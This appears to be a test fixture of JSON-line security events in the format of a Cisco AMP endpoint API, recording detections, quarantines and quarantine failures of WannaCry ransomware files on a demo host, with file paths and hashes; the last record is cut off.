+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 